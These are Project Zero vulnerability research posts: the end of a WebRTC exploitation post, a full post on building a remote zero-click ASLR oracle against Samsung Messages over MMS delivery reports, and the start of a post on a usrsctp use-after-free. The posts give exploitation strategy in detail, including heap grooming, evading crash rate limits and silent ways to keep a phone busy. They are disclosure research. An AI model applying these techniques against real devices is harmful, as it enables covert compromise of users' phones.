It turned out there were quite a few, and they all had problems. I spent some time on SendPacketMessageData and DataReceivedMessageData. These objects are used to store pointers to outgoing RTP data while it is queued. They contain a CopyOnWriteBuffer object, and its first member is a ref-counted pointer to an rtc::Buffer object. It was possible to set the bottom bytes of this pointer to be zero using CVE-2020-6387. Unfortunately, the structure of rtc::Buffer made revealing memory this way challenging.

RefCountedObject vtable;
size_t size_;
size_t capacity_;
std::unique_ptr<T[]> data_;

I was hoping that it would be possible to make the clipped pointer to this structure to point to some other object on the heap that had a pointer in the location of the data_ pointer, and that data would get sent instead. However, it turned out that in the process of sending data, all four members on the object above get accessed and need to be reasonably valid. I went through all the available objects in the same size class as the rtc::Buffer class, but couldn’t find one with these exact properties. 

I then considered that instead of using a different object, I could use an rtc::Buffer object that had already been freed, with a specific backing buffer size that could be replaced with an object containing pointers using heap manipulation. This didn’t work out either. This was largely an issue of reliability. To start off, an rtc::Buffer object is 36 bytes, which translates to size class 48 in jemalloc, meaning 48 bytes get allocated. Imagining some contiguous allocations of this type, the addresses would be as follows.

0x[...]0000      buffer 0
0x[...]0030      buffer 1
0x[...]0060      buffer 2
0x[...]0090      buffer 3
0x[...]00c0      buffer 4
0x[...]00f0       buffer 5
0x[...]0120      buffer 6
...
   
If the first byte of buffers 0 through 5 are set to zero by the vulnerability, they will land on a valid buffer, but if buffer 6 is set to zero, it will not, because 256 doesn’t divide evenly into 48. The end result is that every time the bug hits the SendPacketMessageData  object, there is only a one in three chance it will end up pointing to a valid rtc::Buffer. Hitting the object in the first place is also unreliable, because there are many other allocations of a similar size being made by WebRTC. It’s possible to increase the number of these objects on the heap, and the amount of time before they are sent by using the TCP server to make the connection very slow, but even then I could only hit the structure less than 10% of the time. Having to manipulate the heap so that there are many freed rtc::Buffer objects in a row in the first place, and the backing has been replaced by something containing pointers added even more unreliability. I eventually abandoned this approach because I didn’t think I could get it reliable enough to use in an exploit with a reasonable amount of effort, though I think it’s probably possible. The crash behavior of the application being attacked also matters a lot. This would probably work on an application that respawns immediately in the case of a crash, but would be a lot less practical on an application that stops respawning unless there is a certain delay, which is common on Android.

I also looked a lot at how outgoing packets are generated by WebRTC, especially Remote Transport Control Protocol (RTCP), which a peer always sends, even if it is just receiving audio or video. However, most outgoing packets are generated on the stack, so it is not possible to alter them using heap corruption bugs.

I also considered using a crash oracle to break ASLR, but I felt it was unlikely to succeed with these specific bugs. To start, hitting a heap allocation with them is unreliable, so it would be difficult to tell whether a crash had occurred due to a specific condition, or just because the bug had failed. I was also unsure whether it would even be possible to create detectable conditions considering the limited capabilities of these bugs.

I also thought about using CVE-2020-6387 to alter a vtable or a function pointer in order to read memory, cause behavior detectable by a crash oracle or perform offset-based exploitation that doesn’t require ASLR to be broken. I decided not to pursue this path, because the end result would depend on which functions and vtables are loaded at locations ending in zero, which varies greatly between builds. An exploit written using this method would require a large amount of modification to work on even slightly different versions of WebRTC, and there is no guarantee it would work at all.

I decided at this point that I needed to look for new bugs that could break ASLR, as neither of the ones I’d found recently could do it easily.

Stay tuned for Part 2: A Better Bug, which is scheduled for Wednesday, August 5.
✇Google Project Zero

MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle

By: Tim
Posted by Mateusz Jurczyk, Project Zero

This post is the fourth of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.

Introduction

In Part 3 of the series, I chose one of the 174 obvious Qmage memory corruption crashes reported in Issue #2002 for exploitation. It was a linear heap buffer overflow in RLE decompression with an arbitrary allocation size, overflow size, and overflow data. By carefully adjusting the bitmap dimensions (which control the heap region size), we managed to place the pixel storage buffer directly before the associated android::Bitmap object in memory, allowing us to reliably corrupt it. From there, we constructed some potential RCE primitives, as well as a memory oracle that triggers a control flow-neutral read from a chosen memory area, triggering a crash or not depending on whether the address range is mapped and readable. In terms of low-level capabilities, this is a satisfying set of options to continue working with.

To make further progress in the exploit development, we finally have to get familiar with the MMS protocol that we'll be using as the medium of our attack. Specifically, we need to find a way to remotely leak information about the crash of the target Messages app, or lack thereof, to complete the ASLR oracle and build a more complex ASLR bypass logic on top of it. This is not completely trivial considering the unidirectional nature of MMS, but ultimately possible thanks to the little used feature of delivery reports. However, first things first – let's start with learning more about the protocol itself, and how we can move from sending test messages from a smartphone, to programmatically running experiments from a more comfortable environment of one's workstation.

Setting up a test environment

In order to be able to test MMS effectively, we need an easy way to deliver them to the target device from our PC. There are various methods to achieve this, for example Joshua Drake suggested two ways to send MMS without carriers in his Stagefright Black Hat presentation in 2015 (slides 84-85). However, I decided to take a more practical approach and send all messages through carriers, to be able to observe fully accurate results and spot any real-life issues related to conducting such an attack in practice.

To that end, I purchased two SIM cards for sending and receiving messages, and enabled an "unlimited MMS" package on the sender one to avoid excessive costs. Then, I found and licensed the NowSMS Windows software, which is a powerful solution for sending, receiving, and processing SMS/MMS. It may serve as an SMS server, MMS server, WAP Push Proxy Gateway and Multimedia Messaging Center (MMSC), and has a number of advanced features that are beyond the scope of our use case. Most importantly, it can be used to send messages through a locally connected GSM modem, or an Android phone acting as one. This is precisely the functionality we need, and it's available even in the most basic Now SMS & MMS Lite package. Notably, the service can be used in a number of ways: via a local web interface, through an HTTP API, and through developer API made available for technologies such as PHP, Java and .NET (C#, Visual Basic). The vendor also maintains an extensive documentation regarding both the product and relevant mobile protocols, and hosts an active user forum. All in all, NowSMS proved extremely helpful in my research by making interactions with SMS/MMS easily accessible on a PC, both manually and programmatically.

The screenshot below shows how the MMS sending page looks like in the Web UI (in Developer Mode). We can immediately spot a number of new and unfamiliar settings which are not available to the user when sending a message on a typical mobile phone. It looks like we have gained a much more fine grained control over what is transmitted over the cellular network:

NowSMS MMS sending web panel

The Android phone acting as a modem may operate in three modes: "Local WiFi", "Remote Direct" and "Remote via Cloud". In my case, I used the Remote Direct mode, and connected the sender phone to the local network via an ethernet cable, to prevent any disruptions related to wireless connectivity. At the same time, I connected the victim phone to my workstation via a USB cable for command line access and screen capturing. The structure of my setup is illustrated below:

Example MMS testing setup

I used a Samsung Galaxy A50 as the modem, and Samsung Galaxy Note 10+ as the receiver. In addition to having them connected to the PC for data transfer, it was obviously necessary to keep them charged throughout the testing, and to ensure that they were placed in a spot with strong cellular signal.

Crafting a raw MMS PDU

Now that we have a solid testing environment setup on a PC, we can dig deeper into MMS itself to better understand how it works. MMS is a relatively old technology dating back to circa 2001-2002, and since its inner workings are relevant mostly to mobile network operators, it is not documented as well as many other technologies and protocols seen in widespread use today. However, throughout this project, I have dug up a number of comprehensive books, articles, presentation slides and other educational materials on the subject. They are listed below for your convenience:


The volume of these resources may seem overwhelming, but in fact, we are only interested in a small subset of the MMS architecture, namely the MM1 protocol used between mobile devices and the MMSC (Multimedia Messaging Service Centre). The Phone to MMSC Protocol (MM1) slides from NowSMS are a highly recommended read to get a good overview of its design. In essence, we can view an MMS message as a self-contained binary file of MIME type application/vnd.wap.mms-message. It contains a number of headers (some of them required, some optional), followed by optional Multipart objects – the actual multimedia content of the message (images, audio, video, etc.). The details of the MMS binary encoding are defined by the MMS Encapsulation Protocol, and the list of headers compatible with the M-Send.req request can be found in that document in section "6.1.1 Send Request" on page 17.

An example source file of an MMS message is shown below:

 1:   X-Mms-Message-Type: m-send-req
 2:   X-Mms-Version: 1.3
 3:   To: 0123456789
 4:   Subject: MMS subject
 5:   X-Mms-Message-Class: Personal
 6:   X-Mms-Priority: Normal
 7:   X-NowMMS-Content-Location: message.txt;text/plain
 8:   X-NowMMS-Content-Location: image.jpg;image/jpeg

Lines 1-3 specify mandatory headers, lines 4-6 specify optional headers, and lines 7-8 contain NowSMS-specific headers that point to the multimedia files to include in the message, and indicate their respective MIME types. Such MMS source can be converted to its binary form with NowSMS mmscomp command line utility:

Composing encapsulated MMS with the mmscomp tool

The first 128 bytes of the message.MMS file are shown below; the rest are just the remainder of the JPEG image contents:

00000000: 8c 80 8d 90 97 30 31 32 33 34 35 36 37 38 39 00  .....0123456789.
00000010: 96 4d 4d 53 20 73 75 62 6a 65 63 74 00 8a 80 8f  .MMS subject....
00000020: 81 84 a3 02 1e 0d 83 c0 22 3c 6d 65 73 73 61 67  ........"<messag
00000030: 65 2e 74 78 74 3e 00 8e 6d 65 73 73 61 67 65 2e  e.txt>..message.
00000040: 74 78 74 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64  txt.Hello, world
00000050: 21 1a 84 df 48 9e c0 22 3c 69 6d 61 67 65 2e 6a  !...H.."<image.j
00000060: 70 67 3e 00 8e 69 6d 61 67 65 2e 6a 70 67 00 ff  pg>..image.jpg..
00000070: d8 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00  .....Adobe.d....

In this blob, we can see the binary-encoded headers (for example the two initial 0x8c 0x80 bytes encode "X-Mms-Message-Type: m-send-req"), as well as a number of plaintext strings corresponding to the header values, attachment file names, and data of the embedded files themselves. Such a raw MMS file can be sent via NowSMS, and will be delivered in a very similar form to the recipient device.

As a side note, correctly formatted MMS messages are also expected to contain SMIL (Synchronized Multimedia Integration Language) resources, which define how the multimedia and text should be presented to the user. If you are interested in more details on how they're used in MMS, there is a good tutorial by NowSMS on the subject. However, the SMIL markup seems to be optional in practice, and client apps such as Samsung Messages will correctly display MMS without it. When it comes to file attachments in general, what matters the most for us is that their MIME types are specified explicitly and separately in the encoded message, which enables us to freely send Qmage files marked as image/jpeg (or some other image type) and have them automatically loaded as bitmaps.

MMS delivery reports

Delivery reports have been part of the MMS specification since version 1.0. They enable the sender of a message to request a confirmation of its successful delivery to the recipient. It's one of the very few ways for the sender to receive any kind of (indirect) feedback from the target phone, and it is what we intend to use to complete our ASLR oracle mechanism.

When composing the MMS PDU, a delivery report can be requested by setting the X-Mms-Delivery-Report header to "yes", which is expressed as 0x86 0x81 in binary. Here's how the header is described in Gwenaël Le Bodic's book:

Request for a delivery report. This parameter indicates whether or not delivery report(s) are to be generated for the submitted message. Two values can be assigned to this parameter: 'yes' (delivery report is to be generated) or 'no' (no delivery report requested). If the message class is 'auto', then this parameter is present in the submission PDU and is set to 'no'.

Quite frankly, I have never legitimately used this feature of MMS before. Even though it's part of the protocol, the option to request delivery reports is missing in some common apps such as Google Messages (it only supports SMS delivery reports). However, Samsung Messages does support it, so we can enable the reports under Settings > More settings > Multimedia messages > Show when delivered, and test it out:

Delivery reports in Samsung Messages

The option does indeed work as advertised. Let's take a deeper look at how it is implemented in the protocol and in the client app, and how we can make use of it in our exploit.

A closer look at MM1

Once again, let me start by emphasizing that Gwenaël's slides 24-41 and the entire NowSMS MM1 slide deck explain the MM1 protocol and data flows in great detail. In our case, let's analyze the transactions involved in sending and receiving an MMS in an environment with a few assumptions:

  • The originator and recipient are both in the same network, so there is no inter-operator communication taking place. Whether this is true or not shouldn't make any practical difference for us, as the data exchange between them happens seamlessly over the MM4 protocol and doesn't have any observable side effects (that I know of).
  • The recipient has the auto-retrieval of MMS enabled, which I understand to be the default on a majority or all of Samsung devices.
  • The recipient has good enough connectivity to be able to download the message.
  • The delivery report is requested by the originator.

Under these conditions, the message exchange between two mobile phones and the MMSC is illustrated in the following diagram:

MM1 data flow when sending a legitimate MMS

In a typical scenario, the sender initiates an M-send.req HTTP POST transaction to the carrier. Once the MMS is transmitted in full, the MMSC sends a WAP PUSH notification to the recipient to announce that a message is awaiting. In the case of auto-retrieve, the client app immediately sends an HTTP GET request, and receives the serialized MMS data in response. Finally, it acknowledges the receipt of the message with a M-notifyresp.ind POST request, and that information is forwarded back to the sender in the form of an M-delivery.ind transaction. This concludes the communication between the participating parties.

The biggest problem shown in the diagram is the fact that the Samsung Messages app parses the incoming MMS before finalizing communication with the MMSC through the M-notifyresp.ind PDU. Ideally, any processing of external data should only take place once the connection with MMSC is closed. Otherwise, if the app crashes during the processing of a corrupted media file, the final M-notifyresp.ind message is never transmitted, which causes the MMSC to classify the MMS delivery as unsuccessful and prevents it from sending the delivery receipt to the originator. This creates a very easily observable side channel, revealing whether Samsung Messages crashed on the victim phone or not.

MM1 data flow when sending a corrupted Qmage file via MMS

Coupled with the powerful memory-probing primitive constructed in Part 3, the side channel enables an attacker to remotely query the readability of arbitrary address ranges, with no user interaction required. Such a capability is enormously useful on Android due to the Zygote design, and the fact that the location of code and data in the address space is persistent across program crashes. Consequently, even though the ASLR oracle output only carries 1 bit of information at a time, the overall attack can be broken down into multiple steps, and their results combined to determine complete 64-bit addresses of the necessary gadgets.

We can confirm the behavior by checking the logcat logs on the target device. When we send a regular MMS message, we can see both the WSP/HTTP GET.req and M-notifyresp.ind (POST) requests being made:

d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:25:25.494 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:25:26.449 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: 200 OK
07-23 11:25:27.388 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: response size=66626
07-23 11:25:28.825 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: POST http://<redacted>, proxy=<redacted>, PDU size=16
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: 200 OK
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: response size=0

The time span between receiving the full message from the MMSC and sending the acknowledgement is around 1.5 seconds. On the other hand, when we send a malformed Qmage file, only the WSP/HTTP GET.req request is visible in the logs:

d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:32:10.890 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:32:11.272 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: 200 OK
07-23 11:32:11.273 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: response size=935

Before M-notifyresp.ind can be sent, the process crashes after ~1.3 seconds of reading the HTTP response:

130|d2s:/ $ logcat -b crash -v time
07-23 11:32:12.585 F/libc    (30665): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 31866 (pool-8-thread-1), pid 30665 (droid.messaging)

This confirms the insecure behavior on the client app side. How does it look from the perspective of an attacker? When the M-delivery.ind PDU is received by NowSMS, it is decoded and saved in a text file with a .HDR extension in the "C:\Program Files (x86)\NowSMS\MMS-IN" directory, for example C0B04508.HDR:

X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: [email protected]
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 09:55:00 GMT
Status: Retrieved

The status is indicated as "retrieved", and the report can be associated with the original message through the value of the Message-id header. Otherwise, if the original MMS crashes the target phone, we don't see any immediate return messages in the MMS-IN directory. Depending on the MMS expiry period (specified in the headers or defined by the operator's default setting), the carrier may retry to deliver the message, and if that fails, it eventually expires and the sender is notified about it too:

X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: [email protected]
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 11:03:39 GMT
Status: Expired

The carriers I have experimented with have a default expiration period of 48 hours, and it can be manually adjusted with the X-Mms-Expiry header to values between 1 minute and 48 hours. In my exploit, I didn't use the expiration aspect at all, and simply assumed that Samsung Messages crashed if the delivery report was not received within 30 seconds of sending the message. This completes the construction of a functional MMS-based ASLR oracle, which is an essential building block of a generic ASLR bypass logic discussed in the next blog post in the series.

Further thoughts on oracle reliability

The reliability of the presented ASLR oracle scheme is generally high, provided that both the sender and recipient devices maintain good connectivity with the MMSC. The weakest link is by far the android::Bitmap memory corruption primitive, which relies on two subsequent 160-byte jemalloc allocations being adjacent in memory. This generally holds true, but we have no guarantee that the condition will be always met, especially since the relevant jemalloc bin (chunks between 129-160 bytes in size) is not particularly quiet and is also utilized for other unrelated objects by the Samsung Messages app. Needless to say, any ASLR bypass logic we devise will most likely assume 100% accuracy of the oracle output, so we have to put some extra effort to make sure that the oracle can be indeed relied upon.

One simple technique we can use to improve the reliability of the attack is to have each oracle MMS processed with a relatively clean state of the heap. This can be accomplished by unconditionally crashing the client app with a malformed Qmage file, causing the com.samsung.android.messaging process to be killed and restarted from scratch when the next message arrives on the phone. Of course the ASLR oracle output false already implies a crash taking place, so extra artificial crashes are only needed at the very beginning of the attack (before the first oracle query), and after each query returning true. The type of the artificial crash doesn't matter as long as it always reproduces; it can be a huge out-of-bounds read/write, a NULL pointer dereference, assertion failure, or any condition that doesn't depend on the existing state of the process to trigger a crash. In my exploit, I used the signal_sigsegv_400357fc6c_7014_c1d4fedf1cbcdd583e0f331f32df1f72.qmg sample from crash 39b052a01c99f60982ec92f8d01a5401, which accesses a NULL pointer returned by a malloc call with a negative integer passed as the size.

This one trick allowed me to achieve an oracle accuracy rate of more than 99% (loose estimate) on my Galaxy Note 10+ test device. In my case, it was sufficient to completely rely on each single measurement to successfully defeat ASLR without making any mistakes during the process, but your mileage may vary depending on the device model, Android version, existing history of messages in the SMS app, or even specific options enabled on the phone (such as WiFi) during the attack. If the oracle accuracy drops below a certain threshold, it may be necessary to introduce redundant memory probes sent to the target for each tested address range, and only return the output value to the higher levels of the exploit code once there is enough confidence about its validity.

ActivityManager and crash rate limiting on Android

Based on what we know so far, we can assume that any potential attack will involve a number of crashes of Samsung Messages on the victim phone, some of them carrying address space information and some triggered simply to reset the heap. The ability to continuously crash and have an app restarted on a remote device is a crucial requirement, so we should verify that this is actually possible on Android. If we send corrupted Qmages via MMS twice in a short span of time, we will observe two crashes, as expected:

d2s:/data/local/tmp $ logcat -b crash -v time
07-23 15:52:45.549 F/libc    ( 8930): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10606 (pool-5-thread-1), pid 8930 (droid.messaging)
[...]
07-23 15:52:55.517 F/libc    (10727): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10776 (pool-5-thread-1), pid 10727 (droid.messaging)
[...]

If we then send a third message, Samsung Messages won't be spawned to handle it. Instead, we'll see the following message:

07-23 15:54:28.639 23268 23317 W BroadcastQueue: Unable to launch app com.samsung.android.messaging/10128 for broadcast Intent { act=android.provider.Telephony.WAP_PUSH_DELIVER typ=application/vnd.wap.mms-message flg=0x18000010 cmp=com.samsung.android.messaging/.ui.receiver.smsmms.DefaultSmsAppMmsReceiver (has extras) }: process is bad

At this point, we (as the attacker) are cut off from the device and cannot reach or interact with the remote Qmage attack surface anymore. In fact, the victim won't be able to receive SMS/MMS from anyone until they manually start the Messages app again. So what happened here, and does it mean that all our efforts up to this point were in vain?

When I first saw the warning, I immediately went looking for clues at cs.android.com. It was easy to locate the culprit based on the "process is bad" string: it is printed out when a call to mService.startProcessLocked fails in BroadcastQueue.java. This may generally only happen when mService.mAppErrors.isBadProcessLocked returns true for the app in question:

boolean isBadProcessLocked(ApplicationInfo info) {
      return mBadProcesses.get(info.processName, info.uid) != null;
}

There is a list of bad processes in the system, but how does an app end up on that list? The answer can be found in the handleAppCrashLocked method in AppErrors.java, and specifically in the following lines (slightly reformatted for readability):

if (crashTime != null && now < crashTime + ProcessList.MIN_CRASH_INTERVAL) {
    // The process crashed again very quickly.
    // If it was a bound foreground service, let's try to restart again in a
    // while, otherwise the process loses!
    Slog.w(TAG, "Process " + app.info.processName
            + " has crashed too many times: killing!");
[...]
           mBadProcesses.put(app.info.processName, app.uid,
                    new BadProcessInfo(now, shortMsg, longMsg, stackTrace));

In the above snippet, now is the current timestamp and crashTime is the time of the last crash of the app. Accordingly, the logic checks if two crashes in a single app have occurred in a short period of time, and if so, it bans the process indefinitely from future restarts. How short is short? Let's look up the MIN_CRASH_INTERVAL constant in ProcessList.java:

// The minimum time we allow between crashes, for us to consider this
// application to be bad and stop and its services and reject broadcasts.
static final int MIN_CRASH_INTERVAL = 60 * 1000;

It's 60 seconds. From the attacker's point of view, this is certainly not perfect, but also not terribly bad. This logic of the ActivityManager service means that at no point in time, should we trigger two crashes of the Messages app within one minute, or the attack will be halted. In the context of our ASLR oracle, it limits the probing rate to one query a minute, which may be acceptable or not depending on how many queries are required to break the ASLR. For example, if we consider a realistic attack to be carried out during the night, that leaves us with a maximum of 8 hours × 60 minutes ~= 480 queries. The good news (for exploitation) is, that there is no absolute limit of crashes for one app, and we can interact with the MMS client indefinitely as long as we slow down the communication to meet the crash interval condition.

The diagram below illustrates the high-level process of safely sending two ASLR oracle queries to a target phone, taking the mandatory cooldown period into account. The first query returns true and takes two MMS to complete (one probe and one unconditional crash), and the second one returns false. Note how there is always a guaranteed 60 second gap between two subsequent crashes on the recipient device:

The process of sending subsequent two ASLR oracle queries to the target phone

On a closing note, there is one more important detail to consider in the crash handling logic. If we look closely at the source code of the handleAppCrashLocked method, we can notice that the timestamp is obtained through the SystemClock.uptimeMillis() API:

       final long now = SystemClock.uptimeMillis();

As the documentation states, this is not exactly the wall clock time we have assumed it to be:

uptimeMillis() is counted in milliseconds since the system was booted. This clock stops when the system enters deep sleep (CPU off, display dark, device waiting for external input), but is not affected by clock scaling, idle, or other power saving mechanisms. This is the basis for most interval timing such as Thread#sleep(long), Object#wait(long), and System#nanoTime. This clock is guaranteed to be monotonic, and is suitable for interval timing when the interval does not span device sleep. Most methods that accept a timestamp value currently expect the uptimeMillis() clock.

According to my experimentation on the Galaxy Note 10+ device, when the phone is in an inactive state (e.g. set aside on a bedside table with the display off), the clock indeed doesn't progress. This makes practical zero-click exploitation even more challenging, as it is not enough to just wait for 60 seconds before sending the next MMS. Instead, the attacker has to keep the target phone somehow occupied for those 60 seconds, while not triggering any vibration/notification sounds at the same time. The most obvious way to achieve this is through the cellular network, and I have identified at least three techniques that could be used to silently and remotely keep a phone busy:

  • By sending an MMS with empty text (i.e. an empty text/plain MIME file), a few seconds can be wasted while the phone receives and processes the message. In the end, the empty text leads to an unhandled Java exception being thrown in the Messages app, preventing it from showing any notification to the user. I abused this behavior in my exploit to send an initial "ping" to quietly verify that the recipient phone is responsive (see 0:43-0:56 in the exploit demo). It has been fixed in Samsung Messages since version 11.1.0.61.
  • By sending an MMS with very long text (at least around 140 kB in my testing), a few seconds can be similarly wasted by the victim phone. In this corner case, the misbehavior is slightly different and varies between devices, as the unhandled Java exception is thrown in the midst of generating a user notification, when it is already displayed on the screen, but before the notification sound rings. As such, it also qualifies as a (literally) silent CPU cycle burning trick.
  • By sending a very long SMS of 5180+ characters, which is divided into 34 segments of 140 characters each. The target phone starts receiving the SMS segments, roughly one per second, but for some reason (I didn't investigate this deeply) it stops reassembling the message after the 33rd part, and abandons it completely without generating any notifications. During the process of receiving and saving the initial portions of the SMS in the internal database, the uptimeMillis clock progresses by around 35 seconds in my test setup.

These are some basic ideas for ways to transmit data to the phone such that it has to spend cycles processing it, but fails at some point before notifying the owner. I am sure many more similar techniques exist, and specialized software such as NowSMS certainly helps put the relevant mobile apps to the test against very unusual conditions. All in all, the nature of the uptimeMillis clock is not a fundamental barrier in remote Android exploitation, but it is an annoying aspect that needs to be addressed with the use of additional techniques, and it may extend the overall attack time and impair its reliability. With 60 seconds of active CPU time required between each ASLR oracle query, we might also start being concerned about the extent of power consumption induced by the exploit on target phones with low battery levels… :)

Summary

In this episode, we set up an environment to programmatically send MMS messages from a Windows PC, and learned the basics of the client ⟷ MMSC MM1 protocol and its encapsulation encoding. This enabled us to specify the X-Mms-Delivery-Report header in outgoing messages, and abuse the delivery report feature to establish a 1-bit side channel indicating if the recipient's Messages app crashed while processing our malformed Qmage image or not. Based on this capability and the address-probing primitive built in Part 3, we now have a fully functional (albeit somewhat slow) ASLR oracle at our disposal. We are getting close to defeating ASLR and finally executing arbitrary code.

To make further progress in the research, we have to face a few remaining questions:

  • What types of addresses are we interested in leaking? Which libraries will be needed to achieve RCE, and do we also need to disclose any data locations?
  • How do we find any regions in memory at all, starting with absolutely no initial insight as to where they might be located?
  • Finally, how do we achieve this in a relatively small number of steps (preferably low hundreds), such that the attack has a realistic execution time?

All of these matters will be discussed in detail in the upcoming Part 5. Stay tuned!
✇Google Project Zero

Exploiting Android Messengers with WebRTC: Part 2

By: Tim

Posted by Natalie Silvanovich, Project Zero


This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 3 is scheduled for August 6.

Part 2: A Better Bug


In Part 1, I explored whether it was possible to exploit WebRTC using two memory corruption bugs in RTP processing. While I succeeded at moving the instruction pointer, I was not able to break ASLR, so I decided to look for vulnerabilities more suitable for this purpose.

usrsctp


I started off by going through WebRTC bugs I had filed in the past to see if any had the potential to break ASLR. Even if a bug was fixed long ago, it is an indicator of where similar bugs could potentially be found. One such bug was CVE-2020-6831, which is an out-of-bounds read in usrsctp.

usrsctp is an implementation of Stream Control Transmission Protocol (SCTP) used by WebRTC. Applications that use WebRTC can open data channels, which allow text or binary data to be transmitted from peer to peer. Data channels are often used to allow text messages to be exchanged during a video call, or to tell a peer when certain events have occurred, such as another peer disabling its camera. SCTP is the protocol that underlies data channels. In WebRTC, SCTP is analogous to RTP in that where RTP is used for audio and video content, SCTP is used for data.

I spent some time reviewing the usrsctp code for vulnerabilities. I eventually found CVE-2020-6831, which is a stack buffer overflow in usrsctp. This bug gives the attacker complete control of the size and contents of the overflow. Samuel Groß suggested that this bug could be used to break ASLR by overwriting the stack cookie, and then the return address one byte at a time, and detecting whether the value is correct based on whether the application crashes. Unfortunately, it turned out that this vulnerability is not reachable through WebRTC, as it requires a client socket to connect to a listening socket, meanwhile in WebRTC, both sockets are client sockets.

I kept looking and eventually found CVE-2020-6514. This is a rather unusual bug in how WebRTC interacts with usrsctp. usrsctp supports custom transports, in which case the integrator needs to provide the source and destination address for each connection as a pair of void pointers. The non-dereferenced value of these pointers is then used as an address by usrsctp, which means the value is included in some packets. In WebRTC, the address pointers are set to the address of the SctpTransport instance used by WebRTC. The result is that the location of this object in memory is sent to the remote peer during every SCTP connection. This is technically a bug in WebRTC, though the design of usrsctp is also flawed because using the type void* for custom addresses strongly encourages integrators to use pointers for this value even though this is insecure.

I was hoping this bug would be enough to break ASLR, but it turned out not to be. For an exploit, I needed the location of a loaded library, as well as the location of the heap, so I ran a series of tests on an Android device to see if there was any correlation between these locations, but there was not any. The location of a heap pointer was not enough to determine the location of a loaded library.

I kept looking, and I noticed a vulnerability in how usrsctp processes ASCONF chunks, which are used to manage dynamic IP addresses. The source for the bug is as follows.

if (param_length > sizeof(aparam_buf)) {
SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) larger than buffer size!\n", param_length);
sctp_m_freem(m_ack);
return;
}

if (param_length <= sizeof(struct sctp_paramhdr)) {
SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) too short\n", param_length);
sctp_m_freem(m_ack);
}

Notice that the second call to sctp_m_freem is missing a return, so the m_ack variable can be used after it is freed. After finding this bug, I noticed that it had been patched in more recent versions of usrsctp and WebRTC. I later learned that it was reported by another Googler, Mark Wodrich as Bug 376 in usrsctp on September 19, 2019.

Revealing Memory with Bug 376


Two important questions in analyzing a use-after-free bug is what is freed, and how is it used. In Bug 376, the freed object is an mbuf structure, a type which is used to store the contents of inbound and outbound packets. The mbuf structure starts with a substructure, m_hdr, which is defined as follows.

struct m_hdr {
struct mbuf *mh_next; /* next buffer in chain */
struct mbuf *mh_nextpkt; /* next chain in queue/record */
caddr_t mh_data; /* location of data */
int mh_len; /* amount of data in this mbuf */
int mh_flags; /* flags; see below */
short mh_type; /* type of data in this mbuf */
uint8_t          pad[M_HDR_PAD];/* word align                  */
}

Now, how is this structure used? Looking through the rest of the ASCONF handling, it is eventually added to an outbound packet queue to acknowledge the packet that was sent.

TAILQ_INSERT_TAIL(&stcb->asoc.asconf_ack_sent, ack, next);

This made it very likely that this bug could be used to reveal memory of a remote peer if the freed m_buf structure was replaced with a structure with a pointer to memory continuing pointers, for example, the SctpTransport pointer revealed by CVE-2020-6514.

I tried to do this by sending RTP packets of the same size as the m_buf structure. There’s a nice trick for making a lot of allocations of a specific size that don’t get freed in WebRTC. Video packets get stored in a list before they are assembled into frames, so if the end of a frame is never sent, they will get stored forever, so long as a maximum number of packets is never hit. Unfortunately, this led to an unexpected problem. OpenSSL, which is used by WebRTC happened to have some heap allocations of the same size as an m_buf structure, and if they happened to be allocated in the place of the freed m_buf structure, they would get written to in the m_buf send process, which for some reason would lead to an irrecoverable state in OpenSSL. The application didn’t crash, it would just get stuck in some sort of loop and refuse to accept any more connections.

